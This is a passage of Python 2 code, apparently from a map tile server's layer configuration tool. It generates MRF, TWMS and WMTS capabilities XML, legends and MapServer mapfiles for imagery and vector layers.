bounding_box_node = None
log_sig_err(
"<BoundingBox> tag not present in layer config or MRF header file",
sigevent_url)
continue
if bounding_box_node is not None:
if all(attr in bounding_box_node.attributes.keys()
for attr in ('minx', 'miny', 'maxx', 'maxy')):
geotag_node.appendChild(bounding_box_node)
else:
log_sig_err(
"<BoundingBox> requires minx, miny, maxx, and maxy attributes",
sigevent_url)
continue
mrf_meta.appendChild(geotag_node)
twms = mrf_dom.createElement('TWMS')
levelsElement = mrf_dom.createElement('Levels')
levelsElement.appendChild(
mrf_dom.createTextNode(
str(projection.tilematrixsets[tilematrixset].levels)))
# Get page sizes for TWMS pattern and/or empty tile generation
pageSize = mrf_dom.getElementsByTagName('PageSize')[0]
tileX = int(pageSize.getAttribute('x'))
tileY = int(pageSize.getAttribute('y'))
if emptyTile != None:
# Generate empty tile and override size if colormap is used
if default_colormap != None and skip_empty_tiles == False:
colormap_value = default_colormap.firstChild.nodeValue
colormap_location = default_colormap.attributes[
'location'].value
if colormap_location == '':
colormap_path = colormap_value
else:
colormap_path = add_trailing_slash(
colormap_location) + colormap_value
emptyTileSize = generate_empty_tile(colormap_path, emptyTile,
tileX, tileY)
else: # Override size if there is no colormap
try:
# Get file size
print "\nReading empty tile file: " + emptyTile
emptyTileSize = os.path.getsize(emptyTile)
print "Empty tile size: " + str(emptyTileSize)
                    except:
                        # Default to size 0 so the <EmptyInfo> element below can still be written
                        emptyTileSize = 0
                        mssg = str().join(['Cannot read empty tile: ', emptyTile])
                        log_sig_err(mssg, sigevent_url)
emptyInfoElement = mrf_dom.createElement('EmptyInfo')
emptyInfoElement.setAttribute('size', str(emptyTileSize))
emptyInfoElement.setAttribute('offset', str(emptyTileOffset))
twms.appendChild(levelsElement)
twms.appendChild(emptyInfoElement)
# No longer used
# if colormap:
# metadataElement = mrf_dom.createElement('Metadata')
# metadataElement.appendChild(mrf_dom.createTextNode(colormap))
# twms.appendChild(twms.appendChild(metadataElement))
# add default TWMS patterns
twms_time_pattern = "request=GetMap&layers=%s&srs=%s&format=%s&styles=&time=[-0-9]*&width=%s&height=%s&bbox=[-,\.0-9+Ee]*" % (
identifier, str(projection.id), mrf_format.replace("/", "%2F"),
str(tileX), str(tileY))
twms_notime_pattern = "request=GetMap&layers=%s&srs=%s&format=%s&styles=&width=%s&height=%s&bbox=[-,\.0-9+Ee]*" % (
identifier, str(projection.id), mrf_format.replace("/", "%2F"),
str(tileX), str(tileY))
patterns.append(twms_time_pattern)
patterns.append(twms_notime_pattern)
patternElements = []
for pattern in patterns:
patternElements.append(mrf_dom.createElement('Pattern'))
patternElements[-1].appendChild(
mrf_dom.createCDATASection(pattern))
for patternElement in patternElements:
twms.appendChild(patternElement)
# Time elements
detected_times = []
if static == False:
for time in times:
detected_times += detect_time(time, archiveLocation,
fileNamePrefix, year, has_zdb)
timeElements = []
for detected_time in detected_times:
timeElements.append(mrf_dom.createElement('Time'))
timeElements[-1].appendChild(
mrf_dom.createTextNode(detected_time))
for timeElement in timeElements:
twms.appendChild(timeElement)
mrf_meta.appendChild(twms)
if projection:
projectionElement = mrf_dom.createElement('Projection')
projectionElement.appendChild(
mrf_dom.createCDATASection(projection.wkt))
mrf_meta.appendChild(projectionElement)
if not os.path.exists(twmsEndPoint):
os.makedirs(twmsEndPoint)
if not os.path.exists(wmtsEndPoint):
os.makedirs(wmtsEndPoint)
twms_mrf_filename = twmsEndPoint + '/' + mrf_base
twms_mrf_file = open(twms_mrf_filename, 'w+')
formatted_xml = get_pretty_xml(mrf_dom)
twms_mrf_file.write(formatted_xml)
twms_mrf_file.seek(0)
wmts_mrf_filename = wmtsEndPoint + '/' + mrf_base
# check if file already exists and has same TileMatrixSet, if not then create another file
if os.path.isfile(wmts_mrf_filename):
wmts_mrf_file = open(wmts_mrf_filename, 'r')
if tilematrixset not in wmts_mrf_file.read():
log_sig_warn(
tilematrixset + " not found in existing " +
wmts_mrf_filename +
". Creating new file for TileMatrixSet.", sigevent_url)
wmts_mrf_filename = wmts_mrf_filename.split(
".mrf")[0] + "_" + tilematrixset + ".mrf"
wmts_mrf_file.close()
wmts_mrf_file = open(wmts_mrf_filename, 'w+')
lines = twms_mrf_file.readlines()
# change patterns for WMTS
pattern_replaced = False
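    # Only the first TWMS <Pattern> is kept; it is swapped for the WMTS pattern and the remaining TWMS patterns are dropped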
try:
if is_encoded:
wmts_pattern = "<![CDATA[SERVICE=WMTS&REQUEST=GetTile&VERSION=1.0.0&LAYER=%s&STYLE=(default|encoded)?&TILEMATRIXSET=%s&TILEMATRIX=[0-9]*&TILEROW=[0-9]*&TILECOL=[0-9]*&FORMAT=%s]]>" % (
identifier, tilematrixset, mrf_format.replace("/", "%2F"))
else:
wmts_pattern = "<![CDATA[SERVICE=WMTS&REQUEST=GetTile&VERSION=1.0.0&LAYER=%s&STYLE=(default)?&TILEMATRIXSET=%s&TILEMATRIX=[0-9]*&TILEROW=[0-9]*&TILECOL=[0-9]*&FORMAT=%s]]>" % (
identifier, tilematrixset, mrf_format.replace("/", "%2F"))
except KeyError:
log_sig_exit(
'ERROR', 'TileMatrixSet ' + tilematrixset +
' not found for projection: ' + projection.id, sigevent_url)
for line in lines:
if '<Pattern>' in line:
if pattern_replaced == False:
patternline = line.split('Pattern')
                line = patternline[0] + "Pattern>" + wmts_pattern + "</Pattern" + patternline[-1]
pattern_replaced = True
else:
line = ''
wmts_mrf_file.write(line)
twms_mrf_file.close()
wmts_mrf_file.seek(0)
wmts_mrf_file.close()
try:
mrf_file.close()
except:
pass
print '\n' + twms_mrf_filename + ' configured successfully\n'
print '\n' + wmts_mrf_filename + ' configured successfully\n'
# generate legend if requested
legendUrl_svg_v_meta = ''
legendUrl_svg_h_meta = ''
legendUrl_png_h_url = None
if legend and default_colormap:
colormap_value = default_colormap.firstChild.nodeValue
colormap_location = default_colormap.attributes['location'].value
if colormap_location == '':
colormap_path = colormap_value
else:
colormap_path = add_trailing_slash(
colormap_location) + colormap_value
legend_identifier = os.path.splitext(colormap_value)[0]
legend_output = ''
try:
legend_output = environment.legend_dir + legend_identifier
except:
message = "Legend directory has not been defined for environment with cache location: " + environment.cache
log_sig_err(message, sigevent_url)
try:
if environment.legendUrl != None:
if legend_output != '':
# These URLs _are_ used in the WMTS capabilities
legendUrl_svg_v_meta, legendUrl_svg_v_width, legendUrl_svg_v_height = generate_legend(
colormap_path, legend_output + '_V.svg',
environment.legendUrl + legend_identifier + '_V.svg',
'svg', 'vertical')
legendUrl_svg_h_meta, legendUrl_svg_h_width, legendUrl_svg_h_height = generate_legend(
colormap_path, legend_output + '_H.svg',
environment.legendUrl + legend_identifier + '_H.svg',
'svg', 'horizontal')
# This URL _is not_ used in the WMTS capabilities
legendUrl_png_h_meta, legendUrl_png_h_width, legendUrl_png_h_height = generate_legend(
colormap_path, legend_output + '_H.png',
environment.legendUrl + legend_identifier + '_H.png',
'png', 'horizontal')
# saving this for later since WMS doesn't use the <LegendURL> metadata tag
legendUrl_png_h_url = environment.legendUrl + legend_identifier + '_H.png'
else:
message = "Legend URL has not been defined for environment with cache location: " + environment.cache
log_sig_err(message, sigevent_url)
except:
message = "Error generating legend for " + legend_identifier
log_sig_err(message, sigevent_url)
else: # Vectors
# Vectors aren't supporting z-slices
has_zdb = False
# Detect times for product based on layer configuration <Time> elements
detected_times = []
if static == False:
for time in times:
detected_times += detect_time(time, archiveLocation, fileNamePrefix, year, has_zdb)
# Clear legend variables
legendUrl_svg_v_meta = ''
legendUrl_svg_h_meta = ''
legendUrl_png_h_url = None
# generate archive links if requested
if links:
if len(detected_times) > 0:
print "Generating archive links for " + fileNamePrefix
generate_links(detected_times, archiveLocation, fileNamePrefix,
year, dataFileLocation, has_zdb)
else:
print fileNamePrefix + " is not a time varying layer"
# Modify service files
#getCapabilities TWMS
if no_twms == False:
try:
# Copy and open base GetCapabilities.
getCapabilities_file = twmsEndPoint + '/getCapabilities.xml'
shutil.copyfile(lcdir + '/conf/getcapabilities_base_twms.xml',
getCapabilities_file)
getCapabilities_base = open(getCapabilities_file, 'r+')
except IOError:
mssg = str().join([
'Cannot read getcapabilities_base_twms.xml file: ',
lcdir + '/conf/getcapabilities_base_twms.xml'
])
log_sig_exit('ERROR', mssg, sigevent_url)
else:
lines = getCapabilities_base.readlines()
for idx in range(0, len(lines)):
if '<SRS></SRS>' in lines[idx]:
lines[idx] = lines[idx].replace(
'<SRS></SRS>', '<SRS>' + projection.id + '</SRS>')
if '<CRS></CRS>' in lines[idx]:
lines[idx] = lines[idx].replace(
'<CRS></CRS>', '<CRS>' + projection.id + '</CRS>')
if 'OnlineResource' in lines[idx]:
spaces = lines[idx].index('<')
onlineResource = xml.dom.minidom.parseString(
lines[idx]).getElementsByTagName('OnlineResource')[0]
if 'KeywordList' in lines[idx - 1]:
onlineResource.attributes[
'xlink:href'] = twmsServiceUrl # don't include the cgi portion
else:
onlineResource.attributes[
'xlink:href'] = twmsServiceUrl + "twms.cgi?"
lines[idx] = (' ' * spaces) + onlineResource.toprettyxml(
indent=" ")
getCapabilities_base.seek(0)
getCapabilities_base.truncate()
getCapabilities_base.writelines(lines)
getCapabilities_base.close()
#getTileService
if no_twms == False:
try:
# Copy and open base GetTileService.
getTileService_file = twmsEndPoint + '/getTileService.xml'
shutil.copyfile(lcdir + '/conf/gettileservice_base.xml',
getTileService_file)
getTileService_base = open(getTileService_file, 'r+')
except IOError:
mssg = str().join([
'Cannot read gettileservice_base.xml file: ',
lcdir + '/conf/gettileservice_base.xml'
])
log_sig_exit('ERROR', mssg, sigevent_url)
else:
lines = getTileService_base.readlines()
for idx in range(0, len(lines)):
if 'BoundingBox' in lines[idx]:
lines[idx] = lines[idx].replace(
"BoundingBox", "LatLonBoundingBox").replace(
"{minx}", projection.lowercorner[0]).replace(
"{miny}", projection.lowercorner[1]).replace(
"{maxx}",
projection.uppercorner[0]).replace(
"{maxy}", projection.uppercorner[1])
if 'OnlineResource' in lines[idx]:
spaces = lines[idx].index('<')
onlineResource = xml.dom.minidom.parseString(
lines[idx]).getElementsByTagName('OnlineResource')[0]
if 'KeywordList' in lines[idx - 1]:
onlineResource.attributes[
'xlink:href'] = twmsServiceUrl # don't include the cgi portion
else:
onlineResource.attributes[
'xlink:href'] = twmsServiceUrl + "twms.cgi?"
lines[idx] = (' ' * spaces) + onlineResource.toprettyxml(
indent=" ")
getTileService_base.seek(0)
getTileService_base.truncate()
getTileService_base.writelines(lines)
getTileService_base.close()
#getCapabilities WMTS modify Service URL
if no_wmts == False:
try:
# Copy and open base GetCapabilities.
getCapabilities_file = wmtsEndPoint + '/getCapabilities.xml'
shutil.copyfile(lcdir + '/conf/getcapabilities_base_wmts.xml',
getCapabilities_file)
getCapabilities_base = open(getCapabilities_file, 'r+')
except IOError:
mssg = str().join([
'Cannot read getcapabilities_base_wmts.xml file: ',
lcdir + '/conf/getcapabilities_base_wmts.xml'
])
log_sig_exit('ERROR', mssg, sigevent_url)
else:
lines = getCapabilities_base.readlines()
for idx in range(0, len(lines)):
if '<ows:Get' in lines[idx]:
spaces = lines[idx].index('<')
getUrlLine = lines[idx].replace(
'ows:Get',
'Get xmlns:xlink="http://www.w3.org/1999/xlink"'
).replace('>', '/>')
getUrl = xml.dom.minidom.parseString(
getUrlLine).getElementsByTagName('Get')[0]
if '1.0.0/WMTSCapabilities.xml' in lines[idx]:
getUrl.attributes[
'xlink:href'] = wmtsServiceUrl + '1.0.0/WMTSCapabilities.xml'
elif 'wmts.cgi?' in lines[idx]:
getUrl.attributes[
'xlink:href'] = wmtsServiceUrl + 'wmts.cgi?'
else:
getUrl.attributes['xlink:href'] = wmtsServiceUrl
lines[idx] = (' ' * spaces) + getUrl.toprettyxml(
indent=" ").replace('Get', 'ows:Get').replace(
' xmlns:xlink="http://www.w3.org/1999/xlink"',
'').replace('/>', '>')
if 'ServiceMetadataURL' in lines[idx]:
spaces = lines[idx].index('<')
serviceMetadataUrlLine = lines[idx].replace(
'ServiceMetadataURL',
'ServiceMetadataURL xmlns:xlink="http://www.w3.org/1999/xlink"'
)
serviceMetadataUrl = xml.dom.minidom.parseString(
serviceMetadataUrlLine).getElementsByTagName(
'ServiceMetadataURL')[0]
serviceMetadataUrl.attributes[
'xlink:href'] = wmtsServiceUrl + '1.0.0/WMTSCapabilities.xml'
lines[idx] = (
' ' * spaces
) + serviceMetadataUrl.toprettyxml(indent=" ").replace(
' xmlns:xlink="http://www.w3.org/1999/xlink"', '')
getCapabilities_base.seek(0)
getCapabilities_base.truncate()
getCapabilities_base.writelines(lines)
getCapabilities_base.close()
# create WMTS layer metadata for GetCapabilities
if no_wmts == False and vectorType is None:
try:
# Open layer XML file
layer_xml = open(wmts_mrf_filename.replace('.mrf', '.xml'), 'w+')
except IOError:
mssg = str().join([
'Cannot read layer XML file: ',
wmts_mrf_filename.replace('.mrf', '.xml')
])
log_sig_exit('ERROR', mssg, sigevent_url)
wmts_layer_template = """<Layer>
<ows:Title xml:lang=\"en\">$Title</ows:Title>
$BoundingBox
<ows:Identifier>$Identifier</ows:Identifier>
<ows:Metadata xlink:type="simple" xlink:role="http://earthdata.nasa.gov/gibs/metadata-type/colormap$MapVersion" xlink:href="$ColorMap" xlink:title="GIBS Color Map: Data - RGB Mapping"/>
<ows:Metadata xlink:type="simple" xlink:role="http://earthdata.nasa.gov/gibs/metadata-type/mapbox-gl-style$MapVersion" xlink:href="$VectorStyleJSON" xlink:title="Mapbox GL Layer Styles"/>
<ows:Metadata xlink:type="simple" xlink:role="http://earthdata.nasa.gov/gibs/metadata-type/layer$MapVersion" xlink:href="$VectorMetadataJSON" xlink:title="Layer Vector Metadata"/>
<Style isDefault="true">
<ows:Title xml:lang=\"en\">default</ows:Title>
<ows:Identifier>default</ows:Identifier>
$LegendURL_vertical
$LegendURL_horizontal
</Style>
<Format>$Format</Format>
<Dimension>
<ows:Identifier>Time</ows:Identifier>
<ows:UOM>ISO8601</ows:UOM>
<Default>$DefaultDate</Default>
<Current>false</Current>
<Value>$DateRange</Value>
</Dimension>
<TileMatrixSetLink>
<TileMatrixSet>$TileMatrixSet</TileMatrixSet>$TMSLimits
</TileMatrixSetLink>
<ResourceURL format="$Format" resourceType="tile" template="$WMTSServiceURL$Identifier/default/{Time}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.$FileType"/>
</Layer>"""
layer_output = ""
lines = wmts_layer_template.splitlines(True)
for line in lines:
# replace lines in template
if '<Layer>' in line:
line = ' ' + line
if '</Layer>' in line:
line = ' ' + line + '\n'
if '$Title' in line:
line = line.replace("$Title", title)
if '$BoundingBox' in line:
line = line.replace("$BoundingBox", projection.bbox_xml)
if '$Identifier' in line:
line = line.replace("$Identifier", identifier)
if '$LegendURL_vertical' in line:
line = line.replace("$LegendURL_vertical", legendUrl_svg_v_meta)
if '$LegendURL_horizontal' in line:
line = line.replace("$LegendURL_horizontal", legendUrl_svg_h_meta)
if '$ColorMap' in line:
if colormaps == None or default_colormap == None:
line = ''
else:
line_template = line
# First create line for default colormap
if default_colormap.attributes['url'].value != '':
default_colormap_url = add_trailing_slash(
default_colormap.attributes['url'].
value) + default_colormap.firstChild.nodeValue
else:
default_colormap_url = default_colormap.firstChild.nodeValue
line = line.replace("$MapVersion", '')
line = line.replace("$ColorMap", default_colormap_url)
# Add rest of tags
if default_colormap.attributes['version'].value != '':
for colormap in colormaps:
if colormap.attributes['url'].value != '':
colormap_url = add_trailing_slash(
colormap.attributes['url'].
value) + colormap.firstChild.nodeValue
else:
colormap_url = colormap.firstChild.nodeValue
newline = line_template.replace(
"$MapVersion",
'/' + colormap.attributes['version'].value)
newline = newline.replace("$ColorMap",
colormap_url)
line += newline[3:]
if '$VectorStyleJSON' in line:
if stylejsons == None or default_stylejson == None:
line = ''
else:
line_template = line
# First create line for default style
if default_stylejson.attributes['url'].value != '':
default_stylejson_url = add_trailing_slash(
default_stylejson.attributes['url'].
value) + default_stylejson.firstChild.nodeValue
else:
default_stylejson_url = default_stylejson.firstChild.nodeValue
line = line.replace("$MapVersion", '')
line = line.replace("$VectorStyleJSON", default_stylejson_url)
# Add rest of tags
if default_stylejson.attributes['version'].value != '':
for stylejson in stylejsons:
if stylejson.attributes['url'].value != '':
stylejson_url = add_trailing_slash(
stylejson.attributes['url'].
value) + stylejson.firstChild.nodeValue
else:
stylejson_url = stylejson.firstChild.nodeValue
newline = line_template.replace(
"$MapVersion",
'/' + stylejson.attributes['version'].value)
newline = newline.replace("$VectorStyleJSON",
stylejson_url)
line += newline[3:]
if '$VectorMetadataJSON' in line:
if metadatajsons == None or default_metadatajson == None:
line = ''
else:
line_template = line
# First create line for default metadata
if default_metadatajson.attributes['url'].value != '':
default_metadatajson_url = add_trailing_slash(
default_metadatajson.attributes['url'].
value) + default_metadatajson.firstChild.nodeValue
else:
default_metadatajson_url = default_metadatajson.firstChild.nodeValue
line = line.replace("$MapVersion", '')
line = line.replace("$VectorMetadataJSON",
default_metadatajson_url)
# Add rest of tags
if default_metadatajson.attributes['version'].value != '':
for metadatajson in metadatajsons:
if metadatajson.attributes['url'].value != '':
metadatajson_url = add_trailing_slash(
metadatajson.attributes['url'].
value) + metadatajson.firstChild.nodeValue
else:
metadatajson_url = metadatajson.firstChild.nodeValue
newline = line_template.replace(
"$MapVersion",
'/' + metadatajson.attributes['version'].value)
newline = newline.replace("$VectorMetadataJSON",
metadatajson_url)
line += newline[3:]
if '$Format' in line:
line = line.replace("$Format", mrf_format)
if '$FileType' in line:
if mrf_format == "application/vnd.mapbox-vector-tile":
line = line.replace("$FileType", "mvt")
else:
line = line.replace("$FileType", mrf_format.split('/')[1])
if '$WMTSServiceURL' in line:
line = line.replace("$WMTSServiceURL",
environment.wmtsServiceUrl)
if '$TileMatrixSet' in line:
line = line.replace("$TileMatrixSet", tilematrixset)
if tmsLimits:
line = line.replace('$TMSLimits', tmsLimits.toxml())
else:
line = line.replace('$TMSLimits', '')
tilematrixset_line = line
if static == True or len(detected_times) == 0:
if any(x in line for x in [
'Dimension', '<ows:Identifier>Time</ows:Identifier>',
'<ows:UOM>ISO8601</ows:UOM>', '$DefaultDate',
'<Current>false</Current>', '$DateRange'
]):
line = ''
if '/{Time}' in line:
line = line.replace('/{Time}', '')
else:
if '$DefaultDate' in line:
defaultDate = ''
for detected_time in detected_times:
defaultDate = detected_time.strip().split('/')[1]
line = line.replace("$DefaultDate", defaultDate)
if '$DateRange' in line:
line = line.replace("$DateRange", detected_times[0].strip())
iterTime = iter(detected_times)
next(iterTime)
for detected_time in iterTime:
line += " <Value>" + detected_time + "</Value>\n"
# remove extra white space from lines
line = line[3:]
layer_output = layer_output + line
# Replace extra lines before </Style>
blanks = """
"""
layer_output = layer_output.replace(blanks, "")
# Check if additional encoded style is needed
if is_encoded == True:
style_encoded = """</Style>
<Style isDefault="false">
<ows:Title xml:lang=\"en\">encoded</ows:Title>
<ows:Identifier>encoded</ows:Identifier>
</Style>"""
layer_output = layer_output.replace("</Style>", style_encoded)
layer_xml.writelines(layer_output)
# special case, add additional tilematrixsets from existing file and then remove
existing_layer_xml_filename = wmts_mrf_filename.replace(
'.mrf', '.xml').replace("_" + tilematrixset, '')
if tilematrixset in wmts_mrf_filename:
try:
# Open GetCapabilities.
existing_layer_xml = open(existing_layer_xml_filename, 'r+')
lines = existing_layer_xml.readlines()
os.remove(existing_layer_xml_filename)
for idx in range(0, len(lines)):
if '<TileMatrixSet>' in lines[idx]:
lines[idx] = lines[idx] + tilematrixset_line
layer_xml.seek(0)
layer_xml.writelines(lines)
existing_layer_xml.close()
except:
mssg = str().join([
'Cannot read existing layer XML file: ',
existing_layer_xml_filename
])
log_sig_err(mssg, sigevent_url)
# close new file
layer_xml.close()
# create TWMS layer metadata for GetCapabilities
if not no_twms and vectorType is None:
try:
# Open layer XML file
layer_xml = open(twms_mrf_filename.replace('.mrf', '_gc.xml'), 'w+')
except IOError:
mssg = str().join([
'Cannot read layer XML file: ',
twms_mrf_filename.replace('.mrf', '_gc.xml')
])
log_sig_exit('ERROR', mssg, sigevent_url)
TWMS_GC_LAYER_TEMPLATE = """ <Layer queryable=\"0\">
<Name>{Identifier}</Name>
<Title xml:lang=\"en\">{Title}</Title>
<Abstract xml:lang=\"en\">{Abstract}</Abstract>
<LatLonBoundingBox minx=\"{minx}\" miny=\"{miny}\" maxx=\"{maxx}\" maxy=\"{maxy}\" />
<Style>
<Name>default</Name>
<Title xml:lang=\"en\">(default) Default style</Title>
</Style>
<ScaleHint min=\"10\" max=\"100\"/>
<MinScaleDenominator>100</MinScaleDenominator>
</Layer>
"""
layer_output = bulk_replace(TWMS_GC_LAYER_TEMPLATE, [('{Identifier}', identifier),
('{Title}', title),
('{Abstract}', abstract),
('{minx}', projection.lowercorner[0]),
('{miny}', projection.lowercorner[1]),
('{maxx}', projection.uppercorner[0]),
('{maxy}', projection.uppercorner[1])])
layer_xml.writelines(layer_output)
layer_xml.close()
# create TWMS layer metadata for GetTileService
if not no_twms and vectorType is None:
TWMS_GTS_LAYER_TEMPLATE = """<TiledGroup>
<Name>{TiledGroupName}</Name>
<Title xml:lang=\"en\">{Title}</Title>
<Abstract xml:lang=\"en\">{Abstract}</Abstract>
<Projection>{Projection}</Projection>
<Pad>0</Pad>
<Bands>{Bands}</Bands>
<LatLonBoundingBox minx=\"{minx}\" miny=\"{miny}\" maxx=\"{maxx}\" maxy=\"{maxy}\" />
<Key>${time}</Key>
{Patterns}</TiledGroup>
"""
patterns = ""
cmd = depth + '/oe_create_cache_config -p ' + twms_mrf_filename
try:
print '\nRunning command: ' + cmd
process = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
process.wait()
for output in process.stdout:
patterns = patterns + output
except:
log_sig_err("Error running command " + cmd, sigevent_url)
layer_output = bulk_replace(TWMS_GTS_LAYER_TEMPLATE, [('{TiledGroupName}', tiledGroupName),
('{Title}', title),
('{Abstract}', abstract),
('{Projection}', projection.wkt),
('{Bands}', "4" if mrf_format == 'image/png' else bands),
('{minx}', projection.lowercorner[0]),
('{miny}', projection.lowercorner[1]),
('{maxx}', projection.uppercorner[0]),
('{maxy}', projection.uppercorner[1]),
('{Patterns}', patterns)])
# Write out the GTS XML file
try:
layer_xml = open(twms_mrf_filename.replace('.mrf', '_gts.xml'), 'w+')
layer_xml.writelines(layer_output)
layer_xml.close()
except IOError:
mssg = str().join(['Cannot read layer XML file: ', twms_mrf_filename.replace('.mrf', '_gts.xml') ])
log_sig_exit('ERROR', mssg, sigevent_url)
# Create mapfile if requested and this is not a vector tile product
if create_mapfile and compression != "MVT" and environment.mapfileStagingLocation is not None:
# This block of code will check to see if we can just reuse an existing mapfile generated during the reproject
# configuration. The reproject WMTS-sourced configuration is better, as it handles time snapping correctly.
#
# However, for now we are turning this feature off as there are implications regarding performance that need
# additional testing.
#
# Note: oe_configure_remote_layers generates its own mapfiles based on the include/exclude rules and those should
# be mutually exclusive with the layers configured here.
reuse_wm_mapfiles = False
mapfile_name = os.path.join(environment.mapfileStagingLocation, identifier + '.map')
wm_layer_mapfile = os.path.join(environment.mapfileStagingLocation[:-5] + '3857', identifier + '.map')
if reuse_wm_mapfiles and os.path.exists(wm_layer_mapfile) and projection.id != 'EPSG:3857' and mapfile_name != wm_layer_mapfile:
# Vector layers will be ignored as they aren't reprojected
print('Found, and using, existing reproject mapfile ' + wm_layer_mapfile)
print('Copying to ' + mapfile_name)
shutil.copyfile(wm_layer_mapfile, mapfile_name)
elif wmsSourceLoc == "Remote":
# Use the template to create the new Mapfile snippet
wms_layer_group_info = ''
dimension_info = ''
validation_info = ''
style_info = ''
if wmsLayerGroupName is not None:
wms_layer_group_info = bulk_replace(WMS_LAYER_GROUP_TEMPLATE,
[('{wms_layer_group}', wmsLayerGroupName)])
if not static and len(detected_times) > 0:
defaultDateTime = ''
timeExtent = ''
for detected_time in detected_times:
defaultDateTime = detected_time.strip().split('/')[1]
timeExtent = timeExtent + detected_time.strip() + ","
dimension_info = bulk_replace(DIMENSION_TEMPLATE, [('{periods}', timeExtent.rstrip(',')),
('{default}', defaultDateTime)])
validation_info = VALIDATION_TEMPLATE.replace('{default}', defaultDateTime)
if legend and legendUrl_png_h_url:
style_info = bulk_replace(STYLE_TEMPLATE, [('{width}', str(legendUrl_png_h_width)),
('{height}', str(legendUrl_png_h_height)),
('{href}', legendUrl_png_h_url)])
src_epsg_code = str(projection.id.lower().split(":")[1])
target_bbox = [projection.lowercorner[0], projection.lowercorner[1],
projection.uppercorner[0], projection.uppercorner[1]]
resource_url_template = "$WMTSServiceURL$Identifier/default/{Time}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.$FileType"
template_string = bulk_replace(resource_url_template,
[('$WMTSServiceURL', environment.wmtsServiceUrl),
('$Identifier', identifier),
('$FileType', mrf_format.split('/')[1])])
mapfile_snippet = bulk_replace(
MAPFILE_TEMPLATE,
[('{layer_name}', identifier),
('{data_xml}', make_gdal_tms_xml(None, (4 if mrf_format == 'image/png' else 3), src_epsg_code,
tms=tilematrixset, template_string=template_string)),
('{layer_title}', cgi.escape(title)),
('{wms_layer_group_info}', wms_layer_group_info), ('{dimension_info}', dimension_info),
('{style_info}', style_info), ('{validation_info}', validation_info),
('{src_epsg}', src_epsg_code), ('{target_epsg}', src_epsg_code),
('{target_bbox}', ' '.join(target_bbox))])
if os.path.exists(mapfile_name):
# Warn that we're overwriting a recently modified file
last_mod = os.path.getmtime(mapfile_name)
if tm() - last_mod <= 600:
log_sig_warn("Overwriting layer mapfile " + mapfile_name, sigevent_url)
with open(mapfile_name, 'w+') as mapfile:
mapfile.write(mapfile_snippet)
else: # Create custom layer mapfile with time metadata elements
# Write mapfile info for layer
if os.path.exists(mapfile_name):
# Warn that we're overwriting a recently modified file
last_mod = os.path.getmtime(mapfile_name)
if tm() - last_mod <= 600:
log_sig_warn("Overwriting layer mapfile " + mapfile_name, sigevent_url)
with open(mapfile_name, 'w+') as mapfile:
# Initialize validation values
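                # The %<layer>_TIME% / %<layer>_YEAR% / %<layer>_SUBDAILY% tokens are MapServer runtime substitution variables; the regexes below validate the values supplied at request time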
timeDirPattern = "%" + identifier + "_TIME%_" if not subdaily else "%" + identifier + "_TIME%"
timeParamRegex = '"^([0-9]|T){7}$"'
yearDirPattern = "%" + identifier + "_YEAR%"
yearDirRegex = '"^([0-9]|Y){4}$"'
subdailyDirPattern = "%" + identifier + "_SUBDAILY%_"
subdailyParamRegex = '"^([0-9]|T){6}$"'
minx = projection.lowercorner[0]
miny = projection.lowercorner[1]
maxx = projection.uppercorner[0]
maxy = projection.uppercorner[1]
# Write mapfile lines
mapfile.write("LAYER\n")
mapfile.write("\tNAME\t\"" + identifier + "\"\n")
# If we're grouping layers together... (This is not the hierarchical wms_layer_group)
if wmsGroupName:
# The default time/year needs to be empty because the DATA pattern will contain variables
# for both this layer _and_ its group. If not "", then you get path elements like "YYYY2020"
default_time = ""
default_year = ""
default_subdaily = ""
timeDirPattern = ("%" + wmsGroupName + "_TIME%") + timeDirPattern
yearDirPattern = yearDirPattern + "%" + wmsGroupName + "_YEAR%"
else:
default_time = "TTTTTTT"
default_year = "YYYY"
default_subdaily = "TTTTTT"
if vectorType:
layer_type = vectorType.upper()
else:
layer_type = 'RASTER'
mapfile.write("\tTYPE\t" + layer_type + "\n")
mapfile.write("\tSTATUS\tON\n")
mapfile.write("\tVALIDATION\n")
# The validation was previously being put in the layer METADATA -- deprecated in Mapserver 5.4.0
if not static:
mapfile.write("\t\t\"default_" + identifier + "_TIME\"\t\t\"" + default_time + "\"\n")
mapfile.write("\t\t\"" + identifier + "_TIME\"\t\t\t" + timeParamRegex + "\n")
if wmsGroupName:
mapfile.write("\t\t\"default_" + wmsGroupName + "_TIME\"\t\t\"" + default_time + "\"\n")
mapfile.write("\t\t\"" + wmsGroupName + "_TIME\"\t\t\t" + timeParamRegex + "\n")
if not static and year:
mapfile.write("\t\t\"default_" + identifier + "_YEAR\"\t\"" + default_year + "\"\n")
mapfile.write("\t\t\"" + identifier + "_YEAR\"\t\t" + yearDirRegex + "\n")
if wmsGroupName:
mapfile.write("\t\t\"default_" + wmsGroupName + "_YEAR\"\t\"" + default_year + "\"\n")
mapfile.write("\t\t\"" + wmsGroupName + "_YEAR\"\t\t" + yearDirRegex + "\n")
if not static and subdaily:
mapfile.write("\t\t\"default_" + identifier + "_SUBDAILY\"\t\"" + default_subdaily + "\"\n")
mapfile.write("\t\t\"" + identifier + "_SUBDAILY\"\t\t" + subdailyParamRegex + "\n")
if wmsGroupName:
mapfile.write("\t\t\"default_" + wmsGroupName + "_SUBDAILY\"\t\"" + default_subdaily + "\"\n")
mapfile.write("\t\t\"" + wmsGroupName + "_SUBDAILY\"\t\t" + subdailyParamRegex + "\n")
mapfile.write("\tEND\n")
mapfile.write("\tMETADATA\n")
mapfile.write("\t\t\"wms_title\"\t\t\"" + title + "\"\n")
mapfile.write("\t\t\"wms_extent\"\t\t\"" + minx + " " + miny + " " + maxx + " " + maxy + "\"\n")
if not static and len(detected_times) > 0:
defaultDate = ''
timeExtent = ''
for detected_time in detected_times:
defaultDate = detected_time.strip().split('/')[1]
timeExtent = timeExtent + detected_time.strip() + ","
mapfile.write("\t\t\"wms_timeextent\"\t\"" + timeExtent.rstrip(',') + "\"\n")
mapfile.write("\t\t\"wms_timedefault\"\t\"" + defaultDate + "\"\n")
if wmsLayerGroupName is not None:
if wmsGroupName is not None:
wmsLayerGroupName += "/" + wmsGroupName
mapfile.write("\t\t\"wms_layer_group\"\t\"" + wmsLayerGroupName + "\"\n")
elif wmsGroupName is not None:
mapfile.write("\t\t\"wms_layer_group\"\t\t\"" + wmsGroupName + "\"\n")
if legend and legendUrl_png_h_url:
